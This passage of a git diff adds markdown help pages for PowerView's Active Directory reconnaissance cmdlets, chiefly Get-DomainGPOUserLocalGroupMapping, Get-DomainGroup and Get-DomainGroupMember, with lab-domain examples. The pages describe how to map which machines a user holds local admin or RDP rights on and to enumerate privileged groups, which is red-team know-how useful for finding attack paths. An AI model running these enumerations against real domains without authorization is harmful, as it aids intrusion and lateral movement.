+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveMembersToSIDs
+Switch.
+Indicates that any member names should be resolved to their domain SIDs.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOGroup
+
+## NOTES
+
+## RELATED LINKS
+
+[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/)
+
diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
new file mode 100755
index 0000000..d42a4be
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
@@ -0,0 +1,258 @@
+# Get-DomainGPOUserLocalGroupMapping
+
+## SYNOPSIS
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation.
+If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+ 1.
+resolving the user/group to its proper SID
+ 2.
+enumerating all groups the user/group is a current part of
+ and extracting all target SIDs to build a target SID list
+ 3.
+pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+ Get-DomainGPOLocalGroup
+ 4.
+matching the target SID list to the queried GPO SID list
+ to enumerate all GPO the user is effectively applied with
+ 5.
+enumerating all OUs and sites and applicable GPO GUIs are
+ applied to through gplink enumerating
+ 6.
+querying for all computers under the given OUs or sites
+
+If no user/group is specified, all user/group -\> machine mappings discovered through
+GPO relationships are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-GPOLocation
+```
+
+Find all user/group -\> machine relationships where the user/group is a member
+of the local administrators group on target machines.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/)
+
diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md
new file mode 100755
index 0000000..faaa082
--- /dev/null
+++ b/docs/Recon/Get-DomainGroup.md
@@ -0,0 +1,397 @@
+# Get-DomainGroup
+
+## SYNOPSIS
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all group objects for
+the current domain are returned.
+To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroup | select samaccountname
+```
+
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGroup *admin* | select distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
+```
+
+samaccountname
+--------------
+Server Admins
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
+
+usncreated : 13245
+grouptype : -2147483646
+samaccounttype : 268435456
+samaccountname : Desktop Admins
+whenchanged : 8/10/2016 12:30:30 AM
+objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass : {top, group}
+cn : Desktop Admins
+usnchanged : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name : Desktop Admins
+distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated : 8/10/2016 12:29:43 AM
+instancetype : 4
+objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -MemberIdentity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Group
+
+Custom PSObject with translated group property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md
new file mode 100755
index 0000000..5381b2c
--- /dev/null
+++ b/docs/Recon/Get-DomainGroupMember.md
@@ -0,0 +1,401 @@
+# Get-DomainGroupMember
+
+## SYNOPSIS
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ManualRecurse
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### RecurseUsingMatchingRule
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria.
+Each result is then rebound and the full user
+or group object is returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroupMember "Desktop Admins"
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Testing Group
+GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Recurse
+Switch.
+If the group member is a group, recursively try to query its members as well.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ManualRecurse
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RecurseUsingMatchingRule
+Switch.
+Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: RecurseUsingMatchingRule
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
